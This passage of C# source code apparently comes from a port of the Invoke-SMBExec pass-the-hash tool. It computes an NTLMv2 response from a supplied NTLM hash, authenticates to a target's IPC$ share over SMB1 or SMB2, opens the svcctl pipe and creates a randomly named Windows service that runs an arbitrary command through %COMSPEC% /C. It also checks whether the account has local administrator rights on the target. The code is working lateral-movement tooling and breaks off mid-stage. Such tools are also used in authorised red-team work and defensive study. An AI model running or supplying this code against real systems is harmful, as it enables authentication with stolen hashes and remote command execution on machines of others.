369 | byte[] Auth_Username_Bytes = Encoding.Unicode.GetBytes(username);
370 | byte[] Auth_Domain_Length = BitConverter.GetBytes(Auth_Domain_Bytes.Length);
371 | Auth_Domain_Length = new byte[] { Auth_Domain_Length[0], Auth_Domain_Length[1] };
372 | byte[] Auth_Username_Length = BitConverter.GetBytes(Auth_Username_Bytes.Length);
373 | Auth_Username_Length = new byte[] { Auth_Username_Length[0], Auth_Username_Length[1] };
374 | byte[] Auth_Hostname_Length = BitConverter.GetBytes(Auth_Hostname_Bytes.Length);
375 | Auth_Hostname_Length = new byte[] { Auth_Hostname_Length[0], Auth_Hostname_Length[1] };
376 | byte[] Auth_Domain_offset = new byte[] { 0x40, 0x00, 0x00, 0x00 };
377 | byte[] Auth_Username_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + 64);
378 | byte[] Auth_Hostname_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + 64);
379 | byte[] Auth_LM_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + 64);
380 | byte[] Auth_NTLM_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + 88);
381 | HMACMD5 HMAC_MD5 = new HMACMD5();
382 | HMAC_MD5.Key = NTLM_hash_bytes;
383 | string Username_And_Target = username.ToUpper();
384 | byte[] Username_Bytes = Encoding.Unicode.GetBytes(Username_And_Target);
385 | byte[] Username_And_Target_bytes = Username_Bytes.Concat(Auth_Domain_Bytes).ToArray();
386 | byte[] NTLMv2_hash = HMAC_MD5.ComputeHash(Username_And_Target_bytes);
387 | Random r = new Random();
388 | byte[] Client_Challenge_Bytes = new byte[8];
389 | r.NextBytes(Client_Challenge_Bytes);
390 |
391 |
392 |
393 | byte[] Security_Blob_Bytes = (new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
394 | .Concat(SMB_Target_Time_Bytes)
395 | .Concat(Client_Challenge_Bytes)
396 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 })
397 | .Concat(SMB_Target_Details)
398 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
399 | byte[] Server_Challenge_And_Security_Blob_Bytes = Server_Challenge_And_Security_Blob_Bytes = SMB_NTLM_challenge.Concat(Security_Blob_Bytes).ToArray();
400 | HMAC_MD5.Key = NTLMv2_hash;
401 | byte[] NTLMv2_Response = HMAC_MD5.ComputeHash(Server_Challenge_And_Security_Blob_Bytes);
402 | if (SMB_Signing)
403 | {
404 | byte[] Session_Base_Key = HMAC_MD5.ComputeHash(NTLMv2_Response);
405 | Session_Key = Session_Base_Key;
406 | HMACSHA256 HMAC_SHA256 = new HMACSHA256();
407 | HMAC_SHA256.Key = Session_Key;
408 | }
409 | NTLMv2_Response = NTLMv2_Response.Concat(Security_Blob_Bytes).ToArray();
410 | byte[] NTLMv2_Response_Length = BitConverter.GetBytes(NTLMv2_Response.Length);
411 | NTLMv2_Response_Length = new byte[] { NTLMv2_Response_Length[0], NTLMv2_Response_Length[1] };
412 | byte[] SMB_Session_Key_offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + NTLMv2_Response.Length + 88);
413 |
414 | byte[] NTLMSSP_response = (new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00 })
415 | .Concat(Auth_LM_Offset)
416 | .Concat(NTLMv2_Response_Length)
417 | .Concat(NTLMv2_Response_Length)
418 | .Concat(Auth_NTLM_Offset)
419 | .Concat(Auth_Domain_Length)
420 | .Concat(Auth_Domain_Length)
421 | .Concat(Auth_Domain_offset)
422 | .Concat(Auth_Username_Length)
423 | .Concat(Auth_Username_Length)
424 | .Concat(Auth_Username_Offset)
425 | .Concat(Auth_Hostname_Length)
426 | .Concat(Auth_Hostname_Length)
427 | .Concat(Auth_Hostname_Offset)
428 | .Concat(SMB_Session_Key_Length)
429 | .Concat(SMB_Session_Key_Length)
430 | .Concat(SMB_Session_Key_offset)
431 | .Concat(SMB_Negotiate_Flags)
432 | .Concat(Auth_Domain_Bytes)
433 | .Concat(Auth_Username_Bytes)
434 | .Concat(Auth_Hostname_Bytes)
435 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
436 | .Concat(NTLMv2_Response).ToArray();
437 | if (ForceSMB1)
438 | {
439 | Packet_SMB_Header = new OrderedDictionary();
440 | SMB_User_ID = new byte[] { SMBClientReceive[32], SMBClientReceive[33] };
441 | Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x73 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, new byte[] { 0xff, 0xff }, Process_ID_Bytes, new byte[] { 0x00, 0x00 });
442 |
443 | if (SMB_Signing)
444 | {
445 | Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
446 | }
447 |
448 | Packet_SMB_Header["SMBHeader_UserID"] = SMB_User_ID;
449 | Packet_NTLMSSP_Negotiate = SMBExec.NTLMSSPAuth(NTLMSSP_response);
450 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
451 | NTLMSSP_Negotiate = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Negotiate);
452 | Packet_SMB_Data = SMBExec.SMBSessionSetupAndXRequest(NTLMSSP_Negotiate);
453 | SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
454 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
455 |
456 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
457 | }
458 | else
459 | {
460 | SMB2_Message_ID += 1;
461 | Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x01, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
462 | Packet_NTLMSSP_Auth = SMBExec.NTLMSSPAuth(NTLMSSP_response);
463 | SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
464 | NTLMSSP_Auth = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Auth);
465 | Packet_SMB2_Data = SMBExec.SMB2SessionSetupRequest(NTLMSSP_Auth);
466 | SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
467 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
468 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
469 | }
470 |
471 |
472 |
473 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
474 |
475 | if (ForceSMB1)
476 | {
477 | if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 9, 12)) == "00-00-00-00")
478 | {
479 | if (debug) { output.Append("Authentication Successful"); }
480 | Login_Successful = true;
481 | }
482 | else
483 | {
484 | output.Append(String.Format("Unable to authenticate to {0}", Target));
485 | Console.WriteLine(output.ToString());
486 | }
487 | }
488 | else
489 | {
490 | if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 12, 15)) == "00-00-00-00")
491 | {
492 | if (debug) { output.Append("Authentication Successful"); }
493 | Login_Successful = true;
494 | }
495 | else
496 | {
497 | output.Append(String.Format("Unable to authenticate to {0}", Target));
498 | Console.WriteLine(output.ToString());
499 | }
500 | }
501 |
502 | if (debug) { output.Append(String.Format("Login Status: {0}", Login_Successful)); }
503 | if (Login_Successful)
504 | {
505 | byte[] SMBExec_Command;
506 | byte[] SMB_Path_Bytes;
507 | string SMB_Path = "\\\\" + Target + "\\IPC$";
508 |
509 | if (ForceSMB1)
510 | {
511 | SMB_Path_Bytes = Encoding.UTF8.GetBytes(SMB_Path).Concat(new byte[] { 0x00 }).ToArray();
512 | }
513 | else
514 | {
515 | SMB_Path_Bytes = Encoding.Unicode.GetBytes(SMB_Path);
516 | }
517 |
518 | byte[] SMB_named_pipe_UUID = { 0x81, 0xbb, 0x7a, 0x36, 0x44, 0x98, 0xf1, 0x35, 0xad, 0x32, 0x98, 0xf0, 0x38, 0x00, 0x10, 0x03 };
519 | byte[] SMB_Service_Bytes;
520 | string SMB_Service = null;
521 | if (string.IsNullOrEmpty(ServiceName))
522 | {
523 | const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
524 | var rand = new Random();
525 | SMB_Service = new string(Enumerable.Repeat(chars, 20).Select(s => s[rand.Next(s.Length)]).ToArray());
526 | SMB_Service_Bytes = Encoding.Unicode.GetBytes(SMB_Service).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
527 | }
528 | else
529 | {
530 | SMB_Service = ServiceName;
531 | SMB_Service_Bytes = Encoding.Unicode.GetBytes(SMB_Service);
532 | if (Convert.ToBoolean(SMB_Service.Length % 2))
533 | {
534 | SMB_Service_Bytes = SMB_Service_Bytes.Concat(new byte[] { 0x00, 0x00 }).ToArray();
535 | }
536 | else
537 | {
538 | SMB_Service_Bytes = SMB_Service_Bytes.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
539 | }
540 | }
541 | if (debug) { output.Append(String.Format("Service Name is {0}", SMB_Service)); }
542 | byte[] SMB_Service_Length = BitConverter.GetBytes(SMB_Service.Length + 1);
543 |
544 | if (ComSpec)
545 | {
546 | if (debug) { output.Append("Appending %COMSPEC% /C"); }
547 |
548 | command = "%COMSPEC% /C \"" + command + "\"";
549 | }
550 |
551 | byte[] commandBytes = Encoding.UTF8.GetBytes(command);
552 | List SMBExec_Command_List = new List();
553 | foreach (byte commandByte in commandBytes)
554 | {
555 | SMBExec_Command_List.Add(commandByte);
556 | SMBExec_Command_List.Add(0x00);
557 |
558 | }
559 | byte[] SMBExec_Command_Init = SMBExec_Command_List.ToArray();
560 |
561 | if (Convert.ToBoolean(command.Length % 2))
562 | {
563 | SMBExec_Command = SMBExec_Command_Init.Concat(new byte[] { 0x00, 0x00 }).ToArray();
564 | }
565 | else
566 | {
567 | SMBExec_Command = SMBExec_Command_Init.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
568 | }
569 | byte[] SMBExec_Command_Length_bytes = BitConverter.GetBytes(SMBExec_Command.Length / 2);
570 | int SMB_Split_Index = 4256;
571 | int SMB_Signing_Counter = 0;
572 | byte[] SMB_Tree_ID = new byte[2];
573 | string SMB_Client_Stage_Next = "";
574 | if (ForceSMB1)
575 | {
576 | SMBClientStage = "TreeConnectAndXRequest";
577 | while (SMBClientStage != "exit" && SMBExec_Failed == false)
578 | {
579 | if (debug) { output.Append(String.Format("Current Stage {0}", SMBClientStage)); }
580 | switch (SMBClientStage)
581 | {
582 | case "TreeConnectAndXRequest":
583 | {
584 | Packet_SMB_Header = new OrderedDictionary();
585 | Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x75 }, new byte[] { 0x18 }, new byte[] { 0x01, 0x48 }, new byte[] { 0xff, 0xff }, Process_ID_Bytes, SMB_User_ID);
586 | if (SMB_Signing)
587 | {
588 | Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
589 | SMB_Signing_Counter = 2;
590 | SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
591 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
592 | }
593 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
594 | Packet_SMB_Data = SMBExec.SMBTreeConnectAndXRequest(SMB_Path_Bytes);
595 | SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
596 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
597 |
598 | if (SMB_Signing)
599 | {
600 | SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
601 | SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
602 | SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
603 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature2;
604 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
605 | }
606 |
607 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
608 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
609 | SMBClientStage = "CreateAndXRequest";
610 | }
611 | break;
612 | case "CreateAndXRequest":
613 | {
614 | SMB_Named_Pipe_Bytes = new byte[] { 0x5c, 0x73, 0x76, 0x63, 0x63, 0x74, 0x6c, 0x00 }; //svcctl
615 | SMB_Tree_ID = Utilities.GetByteRange(SMBClientReceive, 28, 29);
616 | Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0xa2 }, new byte[] { 0x18 }, new byte[] { 0x02, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
617 | if (SMB_Signing)
618 | {
619 | Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
620 | SMB_Signing_Counter += 2;
621 | SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
622 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
623 | }
624 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
625 | Packet_SMB_Data = SMBExec.SMBNTCreateAndXRequest(SMB_Named_Pipe_Bytes);
626 | SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
627 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
628 |
629 | if (SMB_Signing)
630 | {
631 | SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
632 | SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
633 | SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
634 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature2;
635 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
636 | }
637 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
638 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
639 | SMBClientStage = "RPCBind";
640 |
641 | }
642 | break;
643 | case "RPCBind":
644 | {
645 | SMB_FID = Utilities.GetByteRange(SMBClientReceive, 42, 43);
646 | Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
647 | if (SMB_Signing)
648 | {
649 | Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
650 | SMB_Signing_Counter += 2;
651 | SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
652 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
653 | }
654 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
655 | Packet_RPC_Data = SMBExec.RPCBind(1, new byte[] { 0xb8, 0x10 }, new byte[] { 0x01 }, new byte[] { 0x00, 0x00 }, SMB_named_pipe_UUID, new byte[] { 0x02, 0x00 });
656 | RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
657 | Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length);
658 | SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
659 | int RPC_Data_Length = SMB_Data.Length + RPC_Data.Length;
660 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
661 |
662 | if (SMB_Signing)
663 | {
664 | SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
665 |
666 | SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
667 | SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
668 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
669 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
670 | }
671 |
672 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
673 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
674 | SMBClientStage = "ReadAndXRequest";
675 | SMB_Client_Stage_Next = "OpenSCManagerW";
676 | }
677 | break;
678 | case "ReadAndXRequest":
679 | {
680 | Thread.Sleep(sleep * 1000);
681 | Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2e }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
682 | if (SMB_Signing)
683 | {
684 | Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
685 | SMB_Signing_Counter += 2;
686 | SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
687 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
688 | }
689 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
690 | Packet_SMB_Data = SMBExec.SMBReadAndXRequest(SMB_FID);
691 | SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
692 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
693 | if (SMB_Signing)
694 | {
695 | SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
696 | SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
697 | SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
698 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature2;
699 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
700 | }
701 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
702 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
703 | SMBClientStage = SMB_Client_Stage_Next;
704 | }
705 | break;
706 |
707 | case "OpenSCManagerW":
708 | {
709 | Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
710 | if (SMB_Signing)
711 | {
712 | Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
713 | SMB_Signing_Counter += 2;
714 | SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
715 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
716 | }
717 |
718 | Packet_SCM_Data = SMBExec.SCMOpenSCManagerW(SMB_Service_Bytes, SMB_Service_Length);
719 | SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
720 | Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0f, 0x00 }, null);
721 | RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
722 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
723 | Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, (RPC_Data.Length + SCM_Data.Length));
724 | SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
725 | int RPC_Data_Length = SMB_Data.Length + SCM_Data.Length + RPC_Data.Length;
726 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
727 |
728 | if (SMB_Signing)
729 | {
730 | SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
731 | SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
732 | SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
733 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
734 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
735 | }
736 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
737 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
738 | SMBClientStage = "ReadAndXRequest";
739 | SMB_Client_Stage_Next = "CheckAccess";
740 | }
741 | break;
742 | case "CheckAccess":
743 | {
744 | if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)) == "00-00-00-00" && BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 88, 107)) != "00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00")
745 | {
746 | SMB_Service_Manager_Context_Handle = Utilities.GetByteRange(SMBClientReceive, 88, 107);
747 | if (SMB_execute)
748 | {
749 | Packet_SCM_Data = SMBExec.SCMCreateServiceW(SMB_Service_Manager_Context_Handle, SMB_Service_Bytes, SMB_Service_Length, SMBExec_Command, SMBExec_Command_Length_bytes);
750 | SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
751 | if (SCM_Data.Length < SMB_Split_Index)
752 | {
753 | SMBClientStage = "CreateServiceW";
754 | }
755 | else
756 | {
757 | SMBClientStage = "CreateServiceW_First";
758 | }
759 | }
760 | else
761 | {
762 | output.Append(String.Format("{0} is a local administrator on {1}", Output_Username, Target));
763 | SMB_Close_Service_Handle_Stage = 2;
764 | SMBClientStage = "CloseServiceHandle";
765 | }
766 |
767 | }
768 | else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)) == "05-00-00-00")
769 | {
770 | output.Append(String.Format("{0} is not a local administrator or does not have the required privileges on {1}", Output_Username, Target));
771 | Console.WriteLine(output.ToString());
772 | }
773 | else
774 | {
775 | if (debug)
776 | {
777 | output.Append(BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)));
778 | output.Append(BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 88, 107)));
779 | }
780 | output.Append(String.Format("Something went wrong with {0}", Target));
781 | Console.WriteLine(output.ToString());
782 | SMBExec_Failed = true;
783 | }
784 |
785 | }
786 |
787 | break;
788 |
789 | case "CreateServiceW":
790 | {
791 | Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
792 | if (SMB_Signing)
793 | {
794 | Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
795 | SMB_Signing_Counter += 2;
796 | SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
797 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
798 | }
799 |
800 | Packet_SCM_Data = SMBExec.SCMCreateServiceW(SMB_Service_Manager_Context_Handle, SMB_Service_Bytes, SMB_Service_Length, SMBExec_Command, SMBExec_Command_Length_bytes);
801 | SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
802 | Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, null);
803 | RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
804 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
805 | Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length + SCM_Data.Length);
806 | SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
807 | int RPC_Data_Length = SMB_Data.Length + SCM_Data.Length + RPC_Data.Length;
808 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
809 |
810 | if (SMB_Signing)
811 | {
812 | SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
813 | SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
814 | SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
815 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
816 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
817 | }
818 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
819 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
820 | SMBClientStage = "ReadAndXRequest";
821 | SMB_Client_Stage_Next = "StartServiceW";
822 | }
823 | break;
824 | case "CreateServiceW_First":
825 | {
826 | SMB_Split_Stage_final = Math.Ceiling((double)SCM_Data.Length / SMB_Split_Index);
827 | Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
828 | if (SMB_Signing)
829 | {
830 | Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
831 | SMB_Signing_Counter += 2;
832 | SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
833 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
834 | }
835 | byte[] SCM_Data_First = Utilities.GetByteRange(SCM_Data, 0, SMB_Split_Index - 1);
836 | Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x01 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_First);
837 | Packet_RPC_Data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_Data.Length);
838 | SMB_Split_Index_Tracker = SMB_Split_Index;
839 | RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
840 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
841 | Packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_Data.Length);
842 | SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
843 | int RPC_Data_Length = SMB_Data.Length + RPC_Data.Length;
844 | NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, RPC_Data_Length);
845 |
846 | if (SMB_Signing)
847 | {
848 | SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
849 | SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
850 | SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
851 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
852 | SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
853 | }
854 | SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).Concat(RPC_Data).ToArray();
855 | SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
856 | if (SMB_Split_Stage_final <= 2)
857 | {
858 | SMBClientStage = "CreateServiceW_Last";
859 | }
860 | else
861 | {
862 | SMB_Split_Stage = 2;
863 | SMBClientStage = "CreateServiceW_Middle";
864 | }
865 | }
866 | break;
867 | case "CreateServiceW_Middle":
868 | {
869 | SMB_Split_Stage++;
870 | Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_Tree_ID, Process_ID_Bytes, SMB_User_ID);
871 | if (SMB_Signing)
872 | {
873 | Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
874 | SMB_Signing_Counter += 2;
875 | SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
876 | Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
877 | }
878 | byte[] SCM_Data_Middle = Utilities.GetByteRange(SCM_Data, SMB_Split_Index_Tracker, SMB_Split_Index_Tracker + SMB_Split_Index - 1);
879 | SMB_Split_Index_Tracker += SMB_Split_Index;
